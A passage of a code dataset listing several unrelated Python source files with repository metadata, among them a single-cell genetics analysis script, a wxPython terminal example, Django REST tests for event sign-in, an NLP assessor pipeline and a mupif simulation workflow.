input_files_dir+\"phenotype.csv.pkl\"\nphenotype = pd.read_pickle(phenotype_file)\nprint(\"Phenotype shape BEFORE selection: {}\".format(phenotype.shape))\nphenotype = xr.DataArray(phenotype.values, dims=[\"trait\", \"cell\"], coords={\"trait\": phenotype.index.values, \"cell\": phenotype.columns.values})\nphenotype = phenotype.sel(cell=sample_mapping[\"phenotype_sample_id\"].values)\nprint(\"Phenotype shape AFTER selection: {}\".format(phenotype.shape))\nassert all(phenotype.cell.values == sample_mapping[\"phenotype_sample_id\"].values)\n\ny = phenotype.sel(trait=gene_name)\n# quantile normalise\ny = quantile_gaussianize(y)\n\n######################################\n########## Cell contexts #############\n######################################\n\n# cells by MOFA factors (20)\nC_file = \"/hps/nobackup/stegle/users/acuomo/all_scripts/struct_LMM2/sc_endodiff/debug_May2021/mofa_logcounts_model_factors.csv\"\nC = pd.read_csv(C_file, index_col = 0)\nC = xr.DataArray(C.values, dims=[\"cell\", \"pc\"], coords={\"cell\": C.index.values, \"pc\": C.columns.values})\nC = C.sel(cell=sample_mapping[\"phenotype_sample_id\"].values)\nassert all(C.cell.values == sample_mapping[\"phenotype_sample_id\"].values)\n\n# quantile normalise cell contexts\nC_gauss = quantile_gaussianize(C)\n\nn_cells = phenotype.shape[1]\nW = ones((n_cells, 1))\n\ny = y.values.reshape(y.shape[0],1)\nprint(y.shape)\n\n######################################\n############ Covariates ##############\n######################################\n\n# just an intercept in this case\nn_cells = phenotype.shape[1]\nW = ones((n_cells, 1))\n\n# unpack G\nGG = G_expanded.values\n\n# get decomposition of K*EEt \n# i.e. get Li's such that K*EEt = L1L1t + L2L2t + ..\n# [U, S, _] = economic_svd(C.values[:,0:20])\n[U, S, _] = economic_svd(C)\ndel _\nus = U * S\nLs = [ddot(us[:,i], hK_expanded) for i in range(us.shape[1])]\ndel us\n\nprint(\"Running for gene {}\".format(trait_name))\ncrm = CellRegMap(y=y, W=W, E=C_gauss.values[:,0:10], Ls=Ls)\n# run association test using CellRegMap\npvals = crm.scan_interaction(G=GG, idx_G = idx_G)[0]\n\npv = pd.DataFrame({\"chrom\":G_expanded.chrom.values,\n \"pv\":pvals,\n \"variant\":G_expanded.snp.values})\npv.head()\n\npv.to_csv(outfilename)\n","repo_name":"annacuomo/CellRegMap_analyses","sub_path":"endodiff/usage/scripts/interaction_test_2snps_per_gene_permuteG.py","file_name":"interaction_test_2snps_per_gene_permuteG.py","file_ext":"py","file_size_in_byte":8086,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"9898162144","text":"import sys\nsys.path.insert(0, '..')\n\nimport wx\nimport wxterm\n\n\nclass Terminal(wx.Panel):\n def __init__(self, parent):\n wx.Panel.__init__(self, parent)\n\n term = wxterm.TerminalWindow(self, allow_bold=False)\n term.ForkCommand('bash', ['bash'])\n term.Bind(wxterm.EVT_TERM_CHILD_EXIT, self.OnExit)\n self.term = term\n\n s = wx.BoxSizer(wx.VERTICAL)\n s.Add(term, 1, wx.EXPAND, 0)\n self.SetSizer(s)\n\n def OnExit(self, event):\n self.GetParent().Close()\n\n\nif __name__ == '__main__':\n app = wx.App(0)\n f = wx.Frame(None, size=(800, 500))\n t = Terminal(f)\n font = wx.Font(9, wx.MODERN, wx.NORMAL, wx.NORMAL)\n t.term.SetFont(font)\n t.SetFocus()\n f.Show()\n app.MainLoop()\n","repo_name":"rpedroso/wxterm","sub_path":"examples/t2.py","file_name":"t2.py","file_ext":"py","file_size_in_byte":751,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} +{"seq_id":"15328596869","text":"# -*- coding: utf8 -*-\nimport time\nimport logging\nfrom apiclient.discovery import build\n\n__author__ = \"imdreamrunner\"\n__email__ = \"imdreamrunner@gmail.com\"\n\n\nlog = logging.getLogger(__name__)\n\n\ndef translate_article(title, content, summary):\n retry = 0\n try:\n return _translate_article(title, content, summary)\n except Exception as ex:\n print(ex)\n retry += 1\n if retry > 3:\n raise ex\n log.info(\"Translation fails, retry in 3 seconds...\")\n time.sleep(3)\n\n\ndef _translate_article(title, content, summary):\n service = build('translate', 'v2', developerKey=\"\")\n result = service.translations().list(target='zh-CN', source='en', q=[title, content, summary]).execute()\n translated = result[\"translations\"][0][\"translatedText\"]\n return result[\"translations\"][0][\"translatedText\"], result[\"translations\"][1][\"translatedText\"], \\\n result[\"translations\"][2][\"translatedText\"]","repo_name":"imdreamrunner/reader","sub_path":"translate/_google.py","file_name":"_google.py","file_ext":"py","file_size_in_byte":949,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"8251588841","text":"from turtle import *\r\n\r\ndef interpret(pgm):\r\n t = Turtle()\r\n for instr in pgm:\r\n if instr == 'F':\r\n t.forward(10)\r\n elif instr == 'L':\r\n t.left(60)\r\n elif instr == 'R':\r\n t.right(120)\r\n else:\r\n print('Syntax error n \"{}\"'.format(instr))\r\n t.hideturtle()\r\n exitonclick()\r\n\r\ninterpret('FLFRFLFRFLFRFLFRFLFRFLFR')\r\n","repo_name":"JungRyung/Python","sub_path":"examples/interpreter.py","file_name":"interpreter.py","file_ext":"py","file_size_in_byte":396,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"41256960885","text":"import os\nimport dill as pickle\nfrom train_ngram import train_ngram\nfrom train_crf_pos import train_crf_pos\nfrom train_morfessor import train_morfessor\nfrom eval import eval\nfrom pos_descriptions import *\nimport morfessor\nfrom stanza import Pipeline\n\n# Parameters\nlang = 'swedish'\ncorp_dir = os.path.join('data', 'corpora')\nmodel_dir = os.path.join('data', 'models')\n\n# Text corpora for training LMs\n# ENGLISH\n#lm_corpus_name = 'wikipedia2008_en.txt'\n# SWEDISH\n#lm_corpus_name = 'wikipedia_sv.txt' #source: https://linguatools.org/\n#lm_corpus_name = 'Yle_sv.pkl' #source: Kielipankki\n# FINNISH\nlm_corpus_name = 'Wikipedia_fi_2017.pkl' #source: Kielipankki\n\n# Text corpora for training POS LMs\n# ENGLISH\n#pos_lm_corpus_name = 'wikipedia2008_en_pos.txt'\n# SWEDISH\n#pos_lm_corpus_name = 'Yle_sv_pos.pkl'\n#pos_lm_corpus_name = 'wikipedia_sv_pos.txt'\n# FINNISH\npos_lm_corpus_name = 'Wikipedia_fi_2017_pos.pkl'\n\n# Text corpora for training Morfessor models\n# SWEDISH\n#morph_corpus = 'yle_sv_minicorpus.txt'\n#morph_corpus = 'Yle_sv.txt'\n# FINNISH\nmorph_corpus = 'Wikipedia_fi_2017.txt'\n\n# Text corpora consisting of word segments used for training morpheme LMs\n# FINNISH \nmorph_lm_corpus_name = 'Wikipedia_fi_2017_morph_segmented.pkl'\n\n# POS-tagged corpora for training POS taggers\n# ENGLISH\n#pos_corpus = nltk.corpus.treebank.tagged_sents()\n#pos_corpus_name = 'Penn_treebank'\n# SWEDISH\n#pos_corpus = 'UD_Swedish-Talbanken.pkl' #source: https://universaldependencies.org/\n#pos_corpus = 'Yle_sv_words_tags.pkl\n# FINNISH\npos_corpus = 'Wikipedia_fi_2017_words_tags.pkl'\n\n# Language Models\n# ENGLISH\n#lm_name = 'wikipedia2008_en_3gram.pkl'\n#lm_name = 'wikipedia2008_en_2gram.pkl'\n# SWEDISH\n#lm_name = 'wikipedia_sv_2gram.pkl'\n#lm_name = 'wikipedia_sv_3gram.pkl'\n#lm_name = 'Yle_sv_2gram.pkl'\n# FINNISH\n#lm_name = 'iltalehti_2gram.pkl'\nlm_name = 'Wikipedia_fi_2017_2gram.pkl'\n#lm_name = 'Wikipedia_fi_2017_3gram.pkl'\n\n# POS Language Models\n# ENGLISH\n#pos_lm_name = 'wikipedia2008_en_pos_3gram.pkl'\n# SWEDISH\n#pos_lm_name = 'wikipedia_sv_pos_3gram.pkl'\n#pos_lm_name = 'Yle_sv_pos_3gram.pkl'\n# FINNISH\npos_lm_name = 'Wikipedia_fi_2017_pos_3gram.pkl'\n\n# Morpheme Language Models\n# FINNISH\n#lm_segmented_name = 'Wikipedia_fi_2017_morph_segmented_3gram.pkl'\nlm_segmented_name = 'Wikipedia_fi_2017_morph_segmented_3gram_interpolated.pkl'\n\n# Morfessor models\n# SWEDISH\n#morph_model_name = 'yle_sv_minicorpus_morph'\n#morph_model_name = 'Yle_sv_morph'\n# FINNISH\nmorph_model_name = 'Wikipedia_fi_2017_morph'\n\n# POS Taggers\n# ENGLISH\n#pos_name = 'Penn_treebank_crf.pkl'\n# SWEDISH\n#pos_name = 'UD_Swedish-Talbanken_crf.pkl'\n#pos_name = 'Yle_sv_pos_crf.pkl'\n# FINNISH\npos_name = 'Wikipedia_fi_2017_words_tags_crf.pkl'\n\n# POS processors for extracting morphological features\n# SWEDISH\n#nlp = Pipeline(lang='sv', processors='tokenize,mwt,pos') #source: https://stanfordnlp.github.io/stanza/\n# FINNISH\nnlp = Pipeline(lang='fi', processors='tokenize,mwt,pos') #source: https://stanfordnlp.github.io/stanza/\n\nlm_type = 'ngram' # language model type\npos_lm_type = 'ngram' # POS language model type\nmorph_lm_type = 'ngram' # morpheme language model type\nn = 2 # ngram size for LM\nn_pos = 3 # ngram size for POS LM\nn_morph = 3 # ngram size for Morpheme LM\nsplit_prob = 0.5 # split probability for train_morfessor()\npos_type = 'crf' # POS model type\nthreshold = float('-inf') # lowest threshold for ngram log-probability\n # in text evaluation\n#text_to_analyze = \"This is a test text. The automatic assessor will report OOV words and uncommon ngrams.\"\n#text_to_analyze = 'Projektet DigiTala har som målsättning att analysera, utveckla och pröva möjligheter att testa muntlig färdighet med elektriska och datorbaserade medel. Oavsett regleringen i gymnasieskolans styrdokument att beakta samtliga kommunikativa delfärdigheter, saknas det muntliga testet fortfarande i den finländska studentexamen.'\ntext_to_analyze = 'DigiTala on poikkitieteellinen tutkimushanke, jonka tavoitteena on kehittää tietokoneavusteinen suullisen kielitaidon koe lukion päättövaiheeseen. '\nresult_file = 'testresult'\n\nTRAIN_LM = False # train new language model or load pretrained one\nTRAIN_POS_LM = False # train new POS language model or load pretrained one\nTRAIN_POS = False # train POS tagger or load pretrained one\nTRAIN_MORPH = False # Train Morfessor model or load pretrained one\nTRAIN_MORPH_LM = False # train new morpheme language model or load pretrained one\nSAVE_REPORT = False # save evaluation results\n\nif TRAIN_LM:\n if lm_type == 'ngram':\n lm = train_ngram(lm_corpus_name, n, words=True)\nelse:\n with open(os.path.join(model_dir, lm_name), 'rb') as f:\n lm = pickle.load(f)\n\nif TRAIN_POS_LM:\n if pos_lm_type == 'ngram':\n pos_lm = train_ngram(pos_lm_corpus_name, n_pos, words=False)\nelse:\n with open(os.path.join(model_dir, pos_lm_name), 'rb') as f:\n pos_lm = pickle.load(f) \n \nif TRAIN_POS:\n if pos_type == 'crf':\n if pos_corpus[-4:] == '.pkl':\n pos_corpus_name = pos_corpus[:-4]\n with open(os.path.join(corp_dir, pos_corpus), 'rb') as f:\n pos_corpus = pickle.load(f)\n pos_tagger = train_crf_pos(pos_corpus, pos_corpus_name)\nelse:\n with open(os.path.join(model_dir, pos_name), 'rb') as f:\n pos_tagger = pickle.load(f)\n \nif TRAIN_MORPH:\n morph_model = train_morfessor(morph_corpus, split_prob)\nelse:\n io = morfessor.MorfessorIO(compound_separator=r\"[^-\\w]+\" ,lowercase=True)\n morph_model = io.read_binary_model_file(os.path.join(model_dir, morph_model_name))\n\nif TRAIN_MORPH_LM:\n if morph_lm_type == 'ngram':\n lm_segmented = train_ngram(morph_lm_corpus_name, n_morph, words=True)\nelse:\n with open(os.path.join(model_dir, lm_segmented_name), 'rb') as f:\n lm_segmented = pickle.load(f) \n\n# Load the descriptions of POS tags\nif pos_name == 'Penn_treebank_crf.pkl':\n pos_descr_dict = pos_dict_en()\nelif pos_name == 'UD_Swedish-Talbanken_crf.pkl' or pos_name == 'Wikipedia_fi_2017_words_tags_crf.pkl':\n pos_descr_dict = pos_dict_sv()\nelif pos_name == 'Yle_sv_pos_crf.pkl':\n pos_descr_dict = pos_dict_sv_suc()\n\neval_result = eval(text_to_analyze, lm, pos_lm, pos_tagger, morph_model,\n lm_segmented, nlp, pos_descr_dict, threshold)\nif SAVE_REPORT:\n with open(os.path.join('results', result_file), 'w', encoding='utf-8') as f:\n f.write(eval_result)","repo_name":"Getmany1/NLP_ngram_assessor","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6413,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"70751750772","text":"class Solution:\n def commonChars(self, words: List[str]) -> List[str]:\n res=list(words[0])\n for word in words:\n newRes=[]\n for c in word:\n if c in res:\n newRes+=c\n res.remove(c)\n res=newRes\n return res","repo_name":"HaojunYuan/MyLeetCode","sub_path":"1002-find-common-characters/1002-find-common-characters.py","file_name":"1002-find-common-characters.py","file_ext":"py","file_size_in_byte":311,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"70460115254","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.test import TestCase\nfrom rest_framework.test import APIClient\nfrom rest_framework.test import APITestCase\nfrom django.contrib.auth.models import User\nfrom api.models import Event\nfrom rest_framework import status\nimport json\n\n\"\"\"\nTests all API calls for CRUD operations of the Event model.\nAll potential invalid and non-nullable fields are tested\n\"\"\"\n\n\nclass ManualUserSignInTest(TestCase):\n\n def setUp(self):\n self.client = APIClient()\n self.url = \"/api/manual_sign_in\"\n\n self.username = \"test1\"\n self.email = \"test@example.com\"\n self.password = \"mypassword\"\n self.user1 = User.objects.create_user(self.username, self.email, self.password)\n\n self.username2 = \"test2\"\n self.email2 = \"test2@example.com\"\n self.password2 = \"mypassword\"\n self.user2 = User.objects.create_user(self.username2, self.email2, self.password2)\n\n login_data = {\n 'username': 'test1',\n 'password': 'mypassword'\n }\n\n self.token_url = \"/api/api-token-auth/\"\n\n token_response = self.client.post(self.token_url, data=login_data, format='json')\n self.token = token_response.data.get('token')\n print(\"\\n\\ntoken\")\n print(self.token)\n\n self.client.credentials(HTTP_AUTHORIZATION='JWT ' + self.token)\n\n self.event = Event.objects.create(\n organiser=\"test1\",\n event_name=\"test\",\n location=\"test\",\n start_time='2050-01-29T12:00:00',\n finish_time='2050-01-29T12:30:00',\n sign_in_time='2050-01-29T12:00:00',\n attendees=['test2']\n )\n\n def test_manual_sign_in_success(self):\n\n data = {\n 'event_id': self.event.id,\n 'user': self.user2.username\n }\n\n response = self.client.post(self.url, data=data, format='json')\n\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n print(\"\\n\\nattending\")\n print(self.event.attending)\n self.assertIsNotNone(response.data)\n\n def test_manual_sign_in_wrong_event_id(self):\n\n data = {\n 'event_id': 999999,\n 'user': self.user2.username\n }\n\n response = self.client.post(self.url, data=data, format='json')\n\n self.assertNotEqual(response.status_code, status.HTTP_200_OK)\n self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)\n self.assertIsNotNone(response.data)\n self.assertIsNotNone(response.data.get('non_field_errors'))\n\n def test_manual_sign_in_wrong_user(self):\n\n data = {\n 'event_id': self.event.id,\n 'user': \"NOT\"\n }\n\n response = self.client.post(self.url, data=data, format='json')\n\n self.assertNotEqual(response.status_code, status.HTTP_200_OK)\n self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)\n self.assertIsNotNone(response.data)\n self.assertIsNotNone(response.data.get('non_field_errors'))\n\n def test_manual_sign_in_already_signed_in(self):\n data = {\n 'event_id': self.event.id,\n 'user': self.user2.username\n }\n\n response = self.client.post(self.url, data=data, format='json')\n\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n self.assertIsNotNone(response.data)\n\n response = self.client.post(self.url, data=data, format='json')\n\n self.assertNotEqual(response.status_code, status.HTTP_200_OK)\n self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)\n self.assertIsNotNone(response.data)\n self.assertIsNotNone(response.data.get('non_field_errors'))\n\n def test_manual_sign_in_already_no_user(self):\n data = {\n 'event_id': self.event.id\n }\n\n response = self.client.post(self.url, data=data, format='json')\n\n self.assertNotEqual(response.status_code, status.HTTP_200_OK)\n self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)\n self.assertIsNotNone(response.data)\n self.assertIsNotNone(response.data.get('user'))\n\n def test_manual_sign_in_already_no_event(self):\n data = {\n 'user': self.user2.username\n }\n\n response = self.client.post(self.url, data=data, format='json')\n\n self.assertNotEqual(response.status_code, status.HTTP_200_OK)\n self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)\n self.assertIsNotNone(response.data)\n self.assertIsNotNone(response.data.get('event_id'))\n","repo_name":"Fanner487/fyp-django","sub_path":"fyp/api/tests/api/test_manual_user_sign_in_api.py","file_name":"test_manual_user_sign_in_api.py","file_ext":"py","file_size_in_byte":4627,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"30563274672","text":"#!/usr/bin/python\n\nfrom helpers.logging_helper import *\nfrom helpers.mysql_helper import exec_mysql_query\nfrom helpers.config_helper import getConfig\n\n\ndef run():\n\tDB_USER = getConfig().get_db_user()\n\tDB_NAME = getConfig().get_db_name('squidlogs')\n\tDB_HOST = getConfig().get_db_host()\n\n\tquery = \"DROP DATABASE IF EXISTS \" + DB_NAME + \";\" + \\\n\t\t\t\"CREATE DATABASE \" + DB_NAME + \" DEFAULT CHARACTER SET utf8 COLLATE utf8_general_ci;\" + \\\n\t\t\t\"GRANT ALL PRIVILEGES ON `\" + DB_NAME + \"` . * \" + \\\n\t\t\t\t\"TO '\" + DB_USER + \"'@'\" + DB_HOST + \"' WITH GRANT OPTION ;\" + \\\n\t\t\t\"GRANT ALL PRIVILEGES ON `\" + DB_NAME + \"` . * \" + \\\n\t\t\t\t\"TO '\" + DB_USER + \"'@'%' WITH GRANT OPTION ;\"\n\n\tlog_msg2(\"Limpiando B.D. squidlogs\")\n\n\tlog_msg3(\"Creando BD..\")\n\texec_mysql_query(DB_NAME, query=query)\n\tlog_msg_ok3()\n\n\tlog_msg3(\"Creando tablas..\")\n\texec_mysql_query(DB_NAME, sql_file='squidlogs_tables.sql')\n\tlog_msg_ok3()\n\n\tlog_msg_ok2()\n","repo_name":"rmajasol/WikipediaStatistics","sub_path":"clear_squidlogs.py","file_name":"clear_squidlogs.py","file_ext":"py","file_size_in_byte":910,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"653336835","text":"\nimport linecache\nimport os\n\n# Convert data file to specified format\n\n# Tag category: BIO\nflag_list = [\"O\",\n \"B-DISE\", \"I-DISE\",\n \"B-PEST\", \"I-PEST\",\n \"B-PATH\", \"I-PATH\",\n \"B-DRUG\", \"I-DRUG\",\n \"B-PLAN\", \"I-PLAN\",\n \"B-WEED\", \"I-WEED\",\n\n \"B-CHEM\", \"I-CHEM\",\n \"B-BIOL\", \"I-BIOL\",\n \"B-TYPE\", \"I-TYPE\",\n \"B-AUXI\", \"I-AUXI\",\n \"B-PAST\", \"I-PAST\",\n \"B-BIST\", \"I-BIST\"\n ]\n\n\n\ndef getdata(the_file_path):\n data_list = []\n for line in open(the_file_path, \"r\"):\n line = line.replace(\"\\n\", \"\")\n data_list.append(line)\n str_begin = data_list[0].split(\"]--[\")\n str_end = data_list[1].split(\"]--[\")\n str_info = data_list[2].split(\"]--[\")\n str_type = data_list[3].split(\"]--[\")\n str_text = data_list[4]\n\n data_flag = []\n behind_flage = flag_list[0]\n for i in range(0,str_text.__len__()):\n char_text = str_text[i:i+1]\n end_type, flag_result = flag_judge(i, str_begin, str_end)\n num_inde = int(str_type[end_type])\n if(num_inde == 6):\n num_inde = 5\n if(num_inde >6):\n flag_result = 0\n if( flag_result == 1):\n if(behind_flage.__eq__(\"O\")):\n char_text = char_text + \" \" +flag_list[num_inde*2-1]\n if(str(i+1) in str_end):\n behind_flage = flag_list[0]\n else:\n behind_flage = flag_list[num_inde *2-1]\n else:\n char_text = char_text + \" \" + flag_list[num_inde*2]\n if (str(i + 1) in str_end):\n behind_flage = flag_list[0]\n else:\n behind_flage = flag_list[num_inde*2]\n else:\n char_text = char_text + \" \" + flag_list[0]\n behind_flage = flag_list[0]\n data_flag.append(char_text)\n return data_flag\n\ndef flag_judge(index, str_begin,str_end):\n end_type = 0\n flag_result = 0\n for i in range(0,str_begin.__len__()):\n if(index >= int(str_begin[i]) and index < int(str_end[i])):\n end_type = i\n flag_result = 1\n return end_type, flag_result\n\ndef walkFile(file):\n files = os.listdir(file)\n files.sort()\n for file_ in files:\n f_name = str(file_)\n if (f_name[-4:].__eq__(\".txt\")):\n va.append(file + \"/\" + f_name)\n\ndef writetext(data_flag, file_path):\n f = open(file_path, 'a')\n for i in range(0,len(data_flag)):\n f.write(data_flag[i] + \"\\n\")\n f.write(\"\\n\")\n f.close()\n\n# Folders to convert\nfile_path_all = \"xxxxx/train/\"\n# Store files after conversion\nfile_path = \"xxxxx/train.txt\"\n\nva = []\nwalkFile(file_path_all)\nfor i in range(0,va.__len__()):\n data_flag = getdata(va[i])\n writetext(data_flag, file_path)\n\n\n","repo_name":"ultrumanti/boluo_zhou","sub_path":"label_program/BIO_create.py","file_name":"BIO_create.py","file_ext":"py","file_size_in_byte":2852,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"35255248087","text":"import re\r\n\r\n\r\n# takes in strings does the maths\r\ndef stringMath(num1, num2, op):\r\n answer = 0\r\n if op == '+':\r\n answer = int(num1) + int(num2)\r\n elif op == '-':\r\n answer = int(num1) - int(num2)\r\n else:\r\n raise Exception('Error: Op must be \"+\" or \"-\"')\r\n return answer\r\n\r\n\r\ndef arithmetic_arranger(probs, ans=False):\r\n Answers = ans\r\n each = []\r\n lenlist = []\r\n opList = []\r\n tL = list()\r\n bL = list()\r\n\r\n if len(probs) > 5:\r\n raise Exception('Error: Too many problems')\r\n for s in probs:\r\n each.append(s.split())\r\n# check for letters in numbers\r\n index = 0\r\n for e in each:\r\n longest = 0\r\n for part in e:\r\n if len(part) > longest:\r\n longest = len(part)\r\n lenlist.append(longest)\r\n\r\n for i in range(len(each)):\r\n if re.search('\\D', each[i][0]) is not None:\r\n raise Exception('Error: Numbers must only contain digits.')\r\n elif re.search('\\D', each[i][2]) is not None:\r\n raise Exception('Error: Numbers must only contain digits.')\r\n\r\n\r\n# print('Len List before add 2: ', lenlist)\r\n\r\n for line in probs:\r\n op = re.findall('.* ([+-])', line)\r\n\r\n if len(op) < 1:\r\n raise Exception('Error: Operator must be \"+\" or \"-\"')\r\n else:\r\n opList.append(op[0])\r\n# construct printable lines\r\n topLine = ''\r\n botLine = ''\r\n\r\n for index in range(len(lenlist)):\r\n lenlist[index] += 2\r\n topLine = topLine + ' '*(lenlist[index] - len(each[index][0])) + each[index][0] + ' '*4\r\n botLine = botLine + opList[index] + ' '*(lenlist[index] - len(each[index][2]) - 1) + each[index][2] + ' '*4\r\n\r\n topLine = topLine.rstrip()\r\n botLine = botLine.rstrip()\r\n# print(topLine)\r\n# print(botLine)\r\n# make dashes\r\n dashes = ''\r\n for i in range(len(lenlist)):\r\n dashes = dashes + '-'*lenlist[i] + ' '*4\r\n# print(dashes)\r\n dashes = dashes.rstrip()\r\n for s in probs:\r\n s.strip()\r\n top = re.findall('^[0-9]*', s)\r\n tL.append(top[0])\r\n bot = re.findall('.*\\s.* ([0-9]+)', s)\r\n bL.append(bot[0])\r\n if len(top[0]) < 1 or len(bot[0]) < 1:\r\n raise Exception('Error: Numbers must only contain digits.')\r\n elif len(top[0]) > 4 or len(bot[0]) > 4:\r\n raise Exception('Error: Numbers cannot be more than four digits.')\r\n\r\n# get answers if asked for\r\n# build return string\r\n returnstring = topLine + '\\n' + botLine + '\\n' + dashes\r\n# print(returnstring)\r\n if Answers is True:\r\n answerstring = ''\r\n for n in range(len(lenlist)):\r\n ans = stringMath(tL[n], bL[n], opList[n])\r\n answerstring = answerstring + ' '*(lenlist[n] - len(str(ans))) + str(ans) + ' '*4\r\n# print(answerstring)\r\n returnstring = returnstring + '\\n' + answerstring.rstrip()\r\n return returnstring\r\n else:\r\n return returnstring\r\n\r\n\r\nlistofstrings = [\"32 + 8\", \"1 - 3801\", \"9999 + 9999\", \"523 - 49\"]\r\n\r\n#arithmetic_arranger(listofstrings, True)\r\n#print()\r\n#arithmetic_arranger(listofstrings)\r\n#print()\r\nprint(arithmetic_arranger([\"32 + 698\", \"3801 - 2\", \"45 + 43\", \"123 + 49\"], True))\r\nprint()\r\n#arithmetic_arranger([\"32 + 8\", \"1 - 3801\", \"9999 + 9999\", \"523 - 49\"], True)\r\n\r\nx = arithmetic_arranger([\"3a3 + 5\"], True)\r\nprint(x)\r\n#arithmetic_arranger([\"35552 + 8\", \"1 - 3801\", \"9999 + 9999\", \"523 * 49\"], True)\r\n","repo_name":"Stablemadness/python_assignments","sub_path":"arithmetic.py","file_name":"arithmetic.py","file_ext":"py","file_size_in_byte":3450,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"28472361887","text":"import sys\nsys.path.extend(['..', '../../..'])\nfrom mupif import *\nimport argparse\n# Read int for mode as number behind '-m' argument: 0-local (default), 1-ssh, 2-VPN\nmode = argparse.ArgumentParser(parents=[Util.getParentParser()]).parse_args().mode\nfrom Config import config\ncfg=config(mode)\nimport mupif.Physics.PhysicalQuantities as PQ\n\nimport logging\nlog = logging.getLogger()\n\nimport time as timeT\nstart = timeT.time()\n\nlog.info('Timer started')\n\n\nclass Example04(Workflow.Workflow):\n \n def __init__(self, metaData={}):\n MD = {\n 'Name': 'Simple application cummulating time steps',\n 'ID': 'N/A',\n 'Description': 'Cummulates time steps',\n 'Model_refs_ID': ['SimulationTimer-1'],\n 'Inputs': [\n {'Type': 'mupif.Property', 'Type_ID': 'mupif.PropertyID.PID_Time_step', 'Name': 'Time step',\n 'Description': 'Time step', 'Units': 's',\n 'Origin': 'Simulated', 'Required': True}],\n 'Outputs': [\n {'Type': 'mupif.Property', 'Type_ID': 'mupif.PropertyID.PID_Time', 'Name': 'Cummulative time',\n 'Description': 'Cummulative time', 'Units': 's', 'Origin': 'Simulated'}]\n }\n\n super(Example04, self).__init__(metaData=MD)\n self.updateMetadata(metaData)\n \n # locate nameserver\n ns = PyroUtil.connectNameServer(nshost=cfg.nshost, nsport=cfg.nsport, hkey=cfg.hkey)\n # connect to JobManager running on (remote) server and create a tunnel to it\n self.jobMan = PyroUtil.connectJobManager(ns, cfg.jobManName, cfg.hkey)\n log.info('Connected to JobManager')\n self.app1 = None\n self.contrib = Property.ConstantProperty(\n (0.,), PropertyID.PID_Time, ValueType.Scalar, 's', PQ.PhysicalQuantity(0., 's'))\n self.retprop = Property.ConstantProperty(\n (0.,), PropertyID.PID_Time, ValueType.Scalar, 's', PQ.PhysicalQuantity(0., 's'))\n\n try:\n self.app1 = PyroUtil.allocateApplicationWithJobManager(\n ns, self.jobMan, cfg.jobNatPorts[0], cfg.hkey,\n PyroUtil.SSHContext(sshClient=cfg.sshClient, options=cfg.options, sshHost=cfg.sshHost)\n )\n log.info(self.app1)\n except Exception as e:\n log.exception(e)\n\n appsig = self.app1.getApplicationSignature()\n log.info(\"Working application 1 on server \" + appsig)\n\n def initialize(self, file='', workdir='', targetTime=PQ.PhysicalQuantity('1 s'), metaData={}, validateMetaData=True, **kwargs):\n super().initialize(targetTime=targetTime, metaData=metaData)\n\n passingMD = {\n 'Execution': {\n 'ID': self.getMetadata('Execution.ID'),\n 'Use_case_ID': self.getMetadata('Execution.Use_case_ID'),\n 'Task_ID': self.getMetadata('Execution.Task_ID')\n }\n }\n self.app1.initialize(metaData=passingMD)\n\n def solveStep(self, istep, stageID=0, runInBackground=False):\n val = Property.ConstantProperty((1000,), PropertyID.PID_Time_step, ValueType.Scalar, 's')\n self.app1.setProperty(val)\n self.app1.solveStep(istep)\n self.retprop = self.app1.getProperty(PropertyID.PID_Time, istep.getTime())\n log.info(\"Sucessfully received \" + str(self.retprop.getValue(istep.getTime())))\n \n def terminate(self): \n self.app1.terminate()\n self.jobMan.terminate()\n super(Example04, self).terminate()\n log.info(\"Time elapsed %f s\" % (timeT.time()-start))\n\n def getProperty(self, propID, time, objectID=0):\n if propID == PropertyID.PID_Time:\n return Property.ConstantProperty(self.retprop.getValue(time), PropertyID.PID_Time, ValueType.Scalar, 's', time)\n else:\n raise APIError.APIError('Unknown property ID')\n \n def setProperty(self, property, objectID=0):\n if property.getPropertyID() == PropertyID.PID_Time_step:\n # remember the mapped value\n self.contrib = property\n else:\n raise APIError.APIError('Unknown property ID')\n\n def getCriticalTimeStep(self):\n return PQ.PhysicalQuantity(1.0, 's')\n\n def getApplicationSignature(self):\n return \"Example04 workflow 1.0\"\n\n def getAPIVersion(self):\n return \"1.0\"\n\n\nif __name__ == '__main__':\n targetTime = PQ.PhysicalQuantity('1 s')\n\n demo = Example04()\n\n executionMetadata = {\n 'Execution': {\n 'ID': '1',\n 'Use_case_ID': '1_1',\n 'Task_ID': '1'\n }\n }\n\n demo.initialize(targetTime=targetTime, metaData=executionMetadata)\n\n demo.solve()\n kpi = demo.getProperty(PropertyID.PID_Time, targetTime)\n demo.terminate()\n if kpi.getValue(targetTime)[0] == 1000.:\n log.info(\"Test OK\")\n kpi = 0\n sys.exit(0)\n else:\n log.info(\"Test FAILED\")\n kpi = 0\n 